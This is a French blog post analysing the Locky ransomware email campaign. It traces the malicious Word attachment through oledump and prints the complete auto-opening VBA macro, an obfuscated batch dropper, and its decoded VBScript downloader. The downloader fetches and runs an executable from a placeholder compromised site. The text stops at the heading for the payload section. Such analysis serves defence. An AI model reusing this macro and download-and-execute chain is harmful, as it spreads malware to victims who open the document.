Locky l’épidémie

Depuis le 16 février, un nouveau pourriel au doux nom de « Locky » se repend par milliers dans les boites de messagerie. Ça s’enflamme assez rapidement.

Les Macro

Le vecteur de contamination reste globalement le même que pour Dridex. Les messages envoyés prétextent une facture à payer pour inciter l’utilisateur à ouvrir un document Microsoft Word qui une fois ouvert, demandera poliment d’activer les macros : à partir de là c’est le drame.

Cependant comme nous allons le voir, nous avons constater quelques différences avec Dridex.

Le document attaché au message est un fichier office au format « Web Archive »… Du coup on en revient à refaire la même chose que lors de notre analyse de Dridex.

Tout d’abord, nous pouvons d’un coup d’œil apporter une attribution « géographique » à cette campagne :

------=_NextPart_01D16A5D.CFD0DE90
Content-Location: file:///C:/D07B2526/dsfff.htm
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="windows-1251"

Encore un coup des Russes ! En effet, le « windows-1251 » correspond au clavier en cyrillique.

Rapidement, nous faisons le nettoyage de ce fichier pour ne garder que le fichier office comme déjà décrit ici :

:~$ tr -d '\r\n' < test2.txt > test2.mime.clean
:~$ base64 -d test2.mime.clean > 36864.txt
:~$ tail -c +51 36864.txt > beheaded.txt
:~$ zlib-flate -uncompress < beheaded.txt > test.final
:~$ file test.final
test.final: Composite Document File V2 Document, No summary info

Jusqu’ici rien d’extraordinaire, nous reproduisons les même étapes que pour Dridex. Pour la suite, nous allons extraire les macro du fichier office via oledump (le cousin belge du breton oletools):

:~$ python ../oledump.py test.final
  1:       640 'PROJECT'
  2:       119 'PROJECTwm'
  3:        97 'UserForm1/\x01CompObj'
  4:       292 'UserForm1/\x03VBFrame'
  5:       130 'UserForm1/f'
  6:     15464 'UserForm1/o'
  7: M    8793 'VBA/Module1'
  8: M    4614 'VBA/Module2'
  9: M    1094 'VBA/ThisDocument'
 10: m    1159 'VBA/UserForm1'
 11:      4805 'VBA/_VBA_PROJECT'
 12:       861 'VBA/dir'

On constate que nous avons 3 Macro et un objet intitulé « UserForm1« . Grâce aux commandes suivantes nous extrayons le code VBA des macros :

$~: python ../oledump.py  beheaded.txt.uncompressed -v -s 7

Attribute VB_Name = "Module1"
Sub VJKBKasd()
Dim sadasddcc, sadqwnczxc
Dim LUPLaAkf, SVARJIYJ, kLoBtrvI As String
Dim QTSHwTIO, NwKlAjMk, ZUufqFZQ As String
QTSHwTIO = "           IBLOWN               "
NwKlAjMk = LTrim(QTSHwTIO)
ZUufqFZQ = RTrim(NwKlAjMk)

LUPLaAkf = "           QUICXB               "
Dim puoLiuLz, wdWXOWXd, UlUBsINx As String
puoLiuLz = "           EGKYKT               "
wdWXOWXd = LTrim(puoLiuLz)
UlUBsINx = RTrim(wdWXOWXd)

SVARJIYJ = LTrim(LUPLaAkf)
Dim sfMPbMBG, ugrXMBxJ, ehgigeMK As String
sfMPbMBG = "           SWBCTJ               "
ugrXMBxJ = LTrim(sfMPbMBG)
ehgigeMK = RTrim(ugrXMBxJ)

kLoBtrvI = RTrim(SVARJIYJ)

Dim GsLARjZX, miAXJSlF, BeojrusT As String
GsLARjZX = "           OCDFPM               "
miAXJSlF = LTrim(GsLARjZX)
BeojrusT = RTrim(miAXJSlF)

Set sadasddcc = CreateObject("Scripting.FileSystemObject")
Dim GZWGAYth, rlalYkjV, YRhdhGNk As String
Dim phXrQVlI, SnqVmwez, ajhAnugP As String
phXrQVlI = "           WHVHEO               "
SnqVmwez = LTrim(phXrQVlI)
ajhAnugP = RTrim(SnqVmwez)

GZWGAYth = "           PCCIVN               "
Dim VXMVRopq, qzYayCfm, xilrIPjT As String
VXMVRopq = "           COQIEY               "
qzYayCfm = LTrim(VXMVRopq)
xilrIPjT = RTrim(qzYayCfm)

rlalYkjV = LTrim(GZWGAYth)
Dim JiIRPfbC, SoLHtkCV, IpezvxmB As String
JiIRPfbC = "           ZKLMPN               "
SoLHtkCV = LTrim(JiIRPfbC)
IpezvxmB = RTrim(SoLHtkCV)

YRhdhGNk = RTrim(rlalYkjV)

Dim nxPoUEax, yllEMVLf, PfNBilPy As String
nxPoUEax = "           WJRCCU               "
yllEMVLf = LTrim(nxPoUEax)
PfNBilPy = RTrim(yllEMVLf)

Set sadqwnczxc = sadasddcc.CreateTextFile(Environ("TEMP") & "\arra.bat", True)
Dim MltDHZME, KrInFRne, rpmEhlEf As String
Dim CpusliaY, bwwyzTON, FsnPujWI As String
CpusliaY = "           WVIZIU               "
bwwyzTON = LTrim(CpusliaY)
FsnPujWI = RTrim(bwwyzTON)

MltDHZME = "           WWJEOH               "
Dim vmzlhQBy, QnFwJvzj, CYnvldtn As String
vmzlhQBy = "           JYLAQD               "
QnFwJvzj = LTrim(vmzlhQBy)
CYnvldtn = RTrim(QnFwJvzj)

KrInFRne = LTrim(MltDHZME)
Dim msYGlHOx, jsHaDMuc, sdNdiBEv As String
msYGlHOx = "           JMKBAG               "
jsHaDMuc = LTrim(msYGlHOx)
sdNdiBEv = RTrim(jsHaDMuc)

rpmEhlEf = RTrim(KrInFRne)

Dim pJQipBog, GSlExlNy, IepfdnhO As String
pJQipBog = "           MSOTNQ               "
GSlExlNy = LTrim(pJQipBog)
IepfdnhO = RTrim(GSlExlNy)

sadqwnczxc.Write (Base64Decode(UserForm1.TextBox1)) + UserForm1.TextBox2
Dim pXWgjdNB, tXynPkcN, aChStwWa As String
Dim rXeEYtlc, lSiuSHTy, WVxawfgb As String
rXeEYtlc = "           KUAZAS               "
lSiuSHTy = LTrim(rXeEYtlc)
WVxawfgb = RTrim(lSiuSHTy)

pXWgjdNB = "           QSNSNN               "
Dim oITeRqNr, iliHZdTZ, lbMLrNOD As String
oITeRqNr = "           EEEQEU               "
iliHZdTZ = LTrim(oITeRqNr)
lbMLrNOD = RTrim(iliHZdTZ)

tXynPkcN = LTrim(pXWgjdNB)
Dim ipZNqdKK, rqSdTkhL, BqXvNwDM As String
ipZNqdKK = "           PLHTCN               "
rqSdTkhL = LTrim(ipZNqdKK)
BqXvNwDM = RTrim(rqSdTkhL)

aChStwWa = RTrim(tXynPkcN)

Dim fMpqoyVL, LHJTwnGQ, cQbNOWUZ As String
fMpqoyVL = "           GEHVQW               "
LHJTwnGQ = LTrim(fMpqoyVL)
cQbNOWUZ = RTrim(LHJTwnGQ)

sadqwnczxc.Close
Dim fHSSzoLB, LQlugEPH, cYzAAVAI As String
Dim guxVfpTU, JkQKCUga, yiHwzlnO As String
guxVfpTU = "           RCHWYI               "
JkQKCUga = LTrim(guxVfpTU)
yiHwzlnO = RTrim(JkQKCUga)

fHSSzoLB = "           WSOLXH               "
Dim qCttcqOx, ceJiBBSU, wFmWCaly As String
qCttcqOx = "           RPHSNU               "
ceJiBBSU = LTrim(qCttcqOx)
wFmWCaly = RTrim(ceJiBBSU)

LQlugEPH = LTrim(fHSSzoLB)
Dim nERLsCim, wRFtYaTw, kTVjayex As String
nERLsCim = "           LEJACK               "
wRFtYaTw = LTrim(nERLsCim)
kTVjayex = RTrim(wRFtYaTw)

cYzAAVAI = RTrim(LQlugEPH)

Dim oBrYuyKr, zhWkVdiU, YqZSqUBv As String
oBrYuyKr = "           LHKJBF               "
zhWkVdiU = LTrim(oBrYuyKr)
YqZSqUBv = RTrim(zhWkVdiU)

Shell Environ("TEMP") & "\arra.bat", vbHide
End Sub

$~: python ../oledump.py  test.final -v -s 8
(ici c est une implémentation tchéque d’un encodeur base64)

Attribute VB_Name = "Module2"
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller, Motobit Software, http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin

'remove white spaces, If any
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")

'The source must consists from groups with Len of 4 chars
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If

' Now decode each group:
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
' Each data group encodes up To 3 actual bytes.
numDataBytes = 3
nGroup = 0

For CharCounter = 0 To 3
' Convert each character into 6 bits of data, And add it To
' an integer For temporary storage.  If a character is a '=', there
' is one fewer data byte.  (There can only be a maximum of 2 '=' In
' the whole string.)

thisChar = Mid(base64String, groupBegin + CharCounter, 1)

If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If

nGroup = 64 * nGroup + thisData
Next

'Hex splits the long To 6 groups with 4 bits
nGroup = Hex(nGroup)

'Add leading zeros
nGroup = String(6 - Len(nGroup), "0") & nGroup

'Convert the 3 byte hex integer (6 chars) To 3 characters
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))

'add numDataBytes characters To out string
sOut = sOut & Left(pOut, numDataBytes)
Next

Base64Decode = sOut
End Function

$~: python ../oledump.py test.final -v -s 9
(la macro autoopen())

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
VJKBKasd
End Sub

Malheureusement, nous ne sommmes pas parvenus à extraire les données de UserForm1 ni avec oledump ni avec oletools…
Tant pis pour nous. [EDIT : Cela est a priori possible, voir la remarque de l’auteur d’oledump dans les commentaires]

Cependant un simple strings sur le fichier suffit parfois à révéler des choses :

:~: strings test.final  | grep exe
cscript //Nologo %DLOAD_SCRIPT% http://<SITE_MECHANT>/6/6.exe %TMP%\asddddd.exe & start %TMP%\asddddd.exe & del  %TMP%\dasdee.vbs & del %TMP%\arra.bat

Nous pouvons donc télécharger ce fichier pour continuer notre analyse.

Plus tard, nous avons sur notre VM ouvert le fichier office et éxécuté la macro : Un fichier arra.bat est alors créé dans le repertoire %TMP% (C:\Users\<login>\AppData\Local\Temp). Ce fichier est obfusqué :

Version obfusquée :

@echo off
set uhzuixvolo=s
%uhzuixvolo%et mhlhbfxioz=e
%uhzuixvolo%%mhlhbfxioz%t pvzjiczcfi=t
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% rombizkvvl=a
goto KBILWGGCTD
%ywetqtwzms%%vukrdvpaiv%%nyexpecczf% ifvkzjdkrp=a
:KBILWGGCTD
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% ctvzypgyki=b
goto QKJOZBLONZ
%ywetqtwzms%%bzdbopjfms%%fjikcmasob% ohgbrdmigm=b
:QKJOZBLONZ
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% qbcenaqizf=c
goto JSGHUIXXNV
%ywetqtwzms%%vdrbpwkgwp%%unhvyxyuny% prrppcovpi=c
:JSGHUIXXNV
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% sheaszhotb=d
goto FDBIMMXLMR
%ywetqtwzms%%skeipzzogm%%wqcykvftsw% nuvewesvkg=d
:FDBIMMXLMR
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% xrfdwtmany=e
goto IBNRGJSDBP
%ywetqtwzms%%dpnggovrvj%%cvuhvpyyxt% ffaqjlplyc=e
:IBNRGJSDBP
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% joyobimqxw=f
goto WNCPNVNUGL
%ywetqtwzms%%rxtluafbkf%%cknpmolswo% ukzcfxnnyz=f
:WNCPNVNUGL
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% gztptlmexs=g
goto QNJWWBDOAJ
%ywetqtwzms%%tdwhaywhec%%aqaxmrazgl% ewynhnffsv=g
:QNJWWBDOAJ
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% qijgcbtpbo=h
goto VASSTWSHJF
%ywetqtwzms%%ynxkdtbtyy%%kvjvchwdvi% kcrwshzkwr=h
:VASSTWSHJF
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% xjuwvucnqm=i
goto GBSXQLEEJC
%ywetqtwzms%%ruudxanbxv%%zeqarsgnje% dgfwtoalgp=i
:GBSXQLEEJC
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% ytfltteaai=j
goto CQVRBPOZYY
%ywetqtwzms%%hvkvbkbxht%%aktvwrxteb% amsetqpsql=j
:CQVRBPOZYY
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% vwjzavhauf=k
goto ESQTONUYCV
%ywetqtwzms%%qebnkaiimp%%zjpqlsqmiz% lrbbjglwfi=k
:ESQTONUYCV
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% oiomndfpjb=l
goto KYJDZHODHS
%ywetqtwzms%%eqqlrncyql%%sqmkfzcuiw% zaihysvguf=l
:KYJDZHODHS
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% dmnyjodsiy=m
goto ECXDBNPERP
%ywetqtwzms%%ypxsatttkj%%obhkxdcjhs% bgkcdqmmoc=m
:ECXDBNPERP
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% foiavmkrnw=n
goto BJKKAQELBM
%ywetqtwzms%%ddgowoimue%%ykybgtjtlo% gplfhkryiy=n
:BJKKAQELBM
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% luakggdwrt=o
goto MNTIRFAPPJ
%ywetqtwzms%%oegsuduitc%%fmiszmsral% zxiybsdghu=o
:MNTIRFAPPJ
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% litsxfqqro=p
goto AWZNFRKZEF
%ywetqtwzms%%difeqosltz%%gwthwlueki% pxyrfcrcrs=p
:AWZNFRKZEF
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% jpgzxifxal=q
goto CCCJLPBFZC
%ywetqtwzms%%mvepsekdnv%%ezyvenxfef% zgpiosymwp=q
:CCCJLPBFZC
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% tupxnybbpi=r
goto HLDMOKGRTZ
%ywetqtwzms%%tbxydyehrs%%payzccjbed% fiayglhklm=r
:HLDMOKGRTZ
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% hcwccjlkee=s
goto ATAFJRSZSV
%ywetqtwzms%%melyeffjbp%%lpbtmgtxty% gslnekjxvi=s
:ATAFJRSZSV
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% jjyyhicqyb=t
goto PTQYMBGVCT
%ywetqtwzms%%jlygeiuqlm%%nrwvzeawxv% evpblnnxpg=t
:PTQYMBGVCT
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% iivswjvkdz=u
goto ZCHPVSNFGP
%ywetqtwzms%%uqhevxquaj%%txofkytacs% whuoyuknec=u
:ZCHPVSNFGP
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% apsmqqhscw=v
goto NOWNCEHWLL
%ywetqtwzms%%iyojjjadpf%%nadfmeucmq% lltaufipdz=v
:NOWNCEHWLL
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% xanniuhgcs=w
goto HODULKYQFJ
%ywetqtwzms%%kfqephrjjc%%khqnlhjjvm% onochdpoiw=w
:HODULKYQFJ
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% hjderkorgo=x
goto MCMQHFNJPF
%ywetqtwzms%%porhscwvdy%%bxdsrprgah% bdlugqumcr=x
:MCMQHFNJPF
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% oloukdxpvm=y
goto XDMVFUZGOC
%ywetqtwzms%%iwobmjiecv%%jufqripwzg% uhzuixvolo=y
:XDMVFUZGOC
%uhzuixvolo%%mhlhbfxioz%%pvzjiczcfi% pvzjiczcfi=z
goto MHLHBFXIOZ
%ywetqtwzms%%ywetqtwzms%%kbilwggctd% rombizkvvl=z
:MHLHBFXIOZ
@echo on
@%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %luakggdwrt%%joyobimqxw%%joyobimqxw%

%tupxnybbpi%%xrfdwtmany%%dmnyjodsiy% -------------------------------------------------------------------------
%hcwccjlkee%%xrfdwtmany%%jjyyhicqyb% DLOAD_SCRIPT=%TMP%\%sheaszhotb%%rombizkvvl%%hcwccjlkee%%sheaszhotb%%xrfdwtmany%%xrfdwtmany%.%apsmqqhscw%%ctvzypgyki%%hcwccjlkee%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% O%litsxfqqro%%jjyyhicqyb%%xjuwvucnqm%%luakggdwrt%%foiavmkrnw% E%hjderkorgo%%litsxfqqro%%oiomndfpjb%%xjuwvucnqm%%qbcenaqizf%%xjuwvucnqm%%jjyyhicqyb%                                                    >  %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% D%xjuwvucnqm%%dmnyjodsiy% %hcwccjlkee%%sheaszhotb%%rombizkvvl%%hcwccjlkee%%sheaszhotb%%hcwccjlkee%%rombizkvvl%%qbcenaqizf%%qbcenaqizf%, %tupxnybbpi%%xrfdwtmany%%xanniuhgcs%%tupxnybbpi%%xanniuhgcs%%xrfdwtmany%%joyobimqxw%, %ytfltteaai%%qbcenaqizf%%hjderkorgo%%qbcenaqizf%%pvzjiczcfi%%hjderkorgo%%qbcenaqizf%%hcwccjlkee%, %xanniuhgcs%%xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%qbcenaqizf%%qbcenaqizf%, %hcwccjlkee%%rombizkvvl%%sheaszhotb%%rombizkvvl%%hcwccjlkee%%sheaszhotb%%apsmqqhscw%%ctvzypgyki%%ctvzypgyki%, %xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%sheaszhotb%%sheaszhotb%%sheaszhotb%                 >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt%.                                                                   >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% S%xrfdwtmany%%jjyyhicqyb% %hcwccjlkee%%sheaszhotb%%rombizkvvl%%hcwccjlkee%%sheaszhotb%%hcwccjlkee%%rombizkvvl%%qbcenaqizf%%qbcenaqizf% = W%hcwccjlkee%%qbcenaqizf%%tupxnybbpi%%xjuwvucnqm%%litsxfqqro%%jjyyhicqyb%.A%tupxnybbpi%%gztptlmexs%%iivswjvkdz%%dmnyjodsiy%%xrfdwtmany%%foiavmkrnw%%jjyyhicqyb%%hcwccjlkee%                                       >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% S%xrfdwtmany%%jjyyhicqyb% %tupxnybbpi%%xrfdwtmany%%xanniuhgcs%%tupxnybbpi%%xanniuhgcs%%xrfdwtmany%%joyobimqxw% = C%tupxnybbpi%%xrfdwtmany%%rombizkvvl%%jjyyhicqyb%%xrfdwtmany%O%ctvzypgyki%%ytfltteaai%%xrfdwtmany%%qbcenaqizf%%jjyyhicqyb%("W%xjuwvucnqm%%foiavmkrnw%H%jjyyhicqyb%%jjyyhicqyb%%litsxfqqro%.W%xjuwvucnqm%%foiavmkrnw%H%jjyyhicqyb%%jjyyhicqyb%%litsxfqqro%R%xrfdwtmany%%jpgzxifxal%%iivswjvkdz%%xrfdwtmany%%hcwccjlkee%%jjyyhicqyb%.5.1")              >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %hcwccjlkee%%rombizkvvl%%sheaszhotb%%rombizkvvl%%hcwccjlkee%%sheaszhotb%%apsmqqhscw%%ctvzypgyki%%ctvzypgyki% = %hcwccjlkee%%sheaszhotb%%rombizkvvl%%hcwccjlkee%%sheaszhotb%%hcwccjlkee%%rombizkvvl%%qbcenaqizf%%qbcenaqizf%(0)                                                      >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%sheaszhotb%%sheaszhotb%%sheaszhotb% = %hcwccjlkee%%sheaszhotb%%rombizkvvl%%hcwccjlkee%%sheaszhotb%%hcwccjlkee%%rombizkvvl%%qbcenaqizf%%qbcenaqizf%(1)                                                   >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt%.                                                                   >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %tupxnybbpi%%xrfdwtmany%%xanniuhgcs%%tupxnybbpi%%xanniuhgcs%%xrfdwtmany%%joyobimqxw%.O%litsxfqqro%%xrfdwtmany%%foiavmkrnw% "GET", %hcwccjlkee%%rombizkvvl%%sheaszhotb%%rombizkvvl%%hcwccjlkee%%sheaszhotb%%apsmqqhscw%%ctvzypgyki%%ctvzypgyki%, F%rombizkvvl%%oiomndfpjb%%hcwccjlkee%%xrfdwtmany%                                        >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %tupxnybbpi%%xrfdwtmany%%xanniuhgcs%%tupxnybbpi%%xanniuhgcs%%xrfdwtmany%%joyobimqxw%.S%xrfdwtmany%%foiavmkrnw%%sheaszhotb%                                                          >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt%.                                                                   >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% S%xrfdwtmany%%jjyyhicqyb% %xanniuhgcs%%xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%qbcenaqizf%%qbcenaqizf% = C%tupxnybbpi%%xrfdwtmany%%rombizkvvl%%jjyyhicqyb%%xrfdwtmany%O%ctvzypgyki%%ytfltteaai%%xrfdwtmany%%qbcenaqizf%%jjyyhicqyb%("ADODB.S%jjyyhicqyb%%tupxnybbpi%%xrfdwtmany%%rombizkvvl%%dmnyjodsiy%")                       >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %xanniuhgcs%%xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%qbcenaqizf%%qbcenaqizf%.O%litsxfqqro%%xrfdwtmany%%foiavmkrnw%                                                     >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %xanniuhgcs%%xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%qbcenaqizf%%qbcenaqizf%.T%oloukdxpvm%%litsxfqqro%%xrfdwtmany% = 1                                                 >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %xanniuhgcs%%xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%qbcenaqizf%%qbcenaqizf%.W%tupxnybbpi%%xjuwvucnqm%%jjyyhicqyb%%xrfdwtmany% %tupxnybbpi%%xrfdwtmany%%xanniuhgcs%%tupxnybbpi%%xanniuhgcs%%xrfdwtmany%%joyobimqxw%.R%xrfdwtmany%%hcwccjlkee%%litsxfqqro%%luakggdwrt%%foiavmkrnw%%hcwccjlkee%%xrfdwtmany%B%luakggdwrt%%sheaszhotb%%oloukdxpvm%                                  >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %xanniuhgcs%%xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%qbcenaqizf%%qbcenaqizf%.P%luakggdwrt%%hcwccjlkee%%xjuwvucnqm%%jjyyhicqyb%%xjuwvucnqm%%luakggdwrt%%foiavmkrnw% = 0                                             >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt%.                                                                   >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% S%xrfdwtmany%%jjyyhicqyb% %ytfltteaai%%qbcenaqizf%%hjderkorgo%%qbcenaqizf%%pvzjiczcfi%%hjderkorgo%%qbcenaqizf%%hcwccjlkee% = C%tupxnybbpi%%xrfdwtmany%%rombizkvvl%%jjyyhicqyb%%xrfdwtmany%O%ctvzypgyki%%ytfltteaai%%xrfdwtmany%%qbcenaqizf%%jjyyhicqyb%("S%qbcenaqizf%%tupxnybbpi%%xjuwvucnqm%%litsxfqqro%%jjyyhicqyb%%xjuwvucnqm%%foiavmkrnw%%gztptlmexs%.F%xjuwvucnqm%%oiomndfpjb%%xrfdwtmany%S%oloukdxpvm%%hcwccjlkee%%jjyyhicqyb%%xrfdwtmany%%dmnyjodsiy%O%ctvzypgyki%%ytfltteaai%%xrfdwtmany%%qbcenaqizf%%jjyyhicqyb%")        >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% I%joyobimqxw% %ytfltteaai%%qbcenaqizf%%hjderkorgo%%qbcenaqizf%%pvzjiczcfi%%hjderkorgo%%qbcenaqizf%%hcwccjlkee%.F%xjuwvucnqm%%oiomndfpjb%%xrfdwtmany%E%hjderkorgo%%xjuwvucnqm%%hcwccjlkee%%jjyyhicqyb%%hcwccjlkee%(%xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%sheaszhotb%%sheaszhotb%%sheaszhotb%) T%qijgcbtpbo%%xrfdwtmany%%foiavmkrnw% %ytfltteaai%%qbcenaqizf%%hjderkorgo%%qbcenaqizf%%pvzjiczcfi%%hjderkorgo%%qbcenaqizf%%hcwccjlkee%.D%xrfdwtmany%%oiomndfpjb%%xrfdwtmany%%jjyyhicqyb%%xrfdwtmany%F%xjuwvucnqm%%oiomndfpjb%%xrfdwtmany% %xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%sheaszhotb%%sheaszhotb%%sheaszhotb% >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %xanniuhgcs%%xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%qbcenaqizf%%qbcenaqizf%.S%rombizkvvl%%apsmqqhscw%%xrfdwtmany%T%luakggdwrt%F%xjuwvucnqm%%oiomndfpjb%%xrfdwtmany% %xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%sheaszhotb%%sheaszhotb%%sheaszhotb%                                        >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt% %xanniuhgcs%%xrfdwtmany%%jpgzxifxal%%xanniuhgcs%%xrfdwtmany%%qbcenaqizf%%qbcenaqizf%.C%oiomndfpjb%%luakggdwrt%%hcwccjlkee%%xrfdwtmany%                                                    >> %DLOAD_SCRIPT%
%xrfdwtmany%%qbcenaqizf%%qijgcbtpbo%%luakggdwrt%.                                                                   >> %DLOAD_SCRIPT%
%tupxnybbpi%%xrfdwtmany%%dmnyjodsiy% -------------------------------------------------------------------------

cscript //Nologo %DLOAD_SCRIPT% http://<SITE_COMPROMIS>/6/6.exe %TMP%\asddddd.exe & start %TMP%\asddddd.exe & del %TMP%\dasdee.vbs & del %TMP%\arra.bat

Une fois que nous avons remplacé toutes les strings  :

rem -------------------------------------------------------------------------
set DLOAD_SCRIPT=%TMP%\dasdee.vbs
echo Option Explicit                                                    >  %DLOAD_SCRIPT%
echo Dim sdasdsacc, rewrwef, jcxcyxcs, weqwecc, sadasdvbb, eqweddd                 >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo Set sdasdsacc = Wscript.Arguments                                       >> %DLOAD_SCRIPT%
echo Set rewrwef = CreateObject("WinHttp.WinHttpRequest.5.1")              >> %DLOAD_SCRIPT%
echo sadasdvbb = sdasdsacc(0)                                                      >> %DLOAD_SCRIPT%
echo eqweddd = sdasdsacc(1)                                                   >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo rewrwef.Open "GET", sadasdvbb, False                                        >> %DLOAD_SCRIPT%
echo rewrwef.Send                                                          >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo Set weqwecc = CreateObject("ADODB.Stream")                       >> %DLOAD_SCRIPT%
echo weqwecc.Open                                                     >> %DLOAD_SCRIPT%
echo weqwecc.Type = 1                                                 >> %DLOAD_SCRIPT%
echo weqwecc.Write rewrwef.ResponseBody                                  >> %DLOAD_SCRIPT%
echo weqwecc.Position = 0                                             >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo Set jcxcyxcs = CreateObject("Scripting.FileSystemObject")        >> %DLOAD_SCRIPT%
echo If jcxcyxcs.FileExists(eqweddd) Then jcxcyxcs.DeleteFile eqweddd >> %DLOAD_SCRIPT%
echo weqwecc.SaveToFile eqweddd                                        >> %DLOAD_SCRIPT%
echo weqwecc.Close                                                    >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
rem -------------------------------------------------------------------------

cscript //Nologo %DLOAD_SCRIPT% http://<SITE_COMPROMIS>/6/6.exe %TMP%\asddddd.exe & start %TMP%\asddddd.exe & del %TMP%\dasdee.vbs & del %TMP%\arra.batxe & del %TMP%\dasdee.vbs & del %TMP%\arra.bat

On retrouve bien la même chose qu’avec un simple « strings ».

La Charge

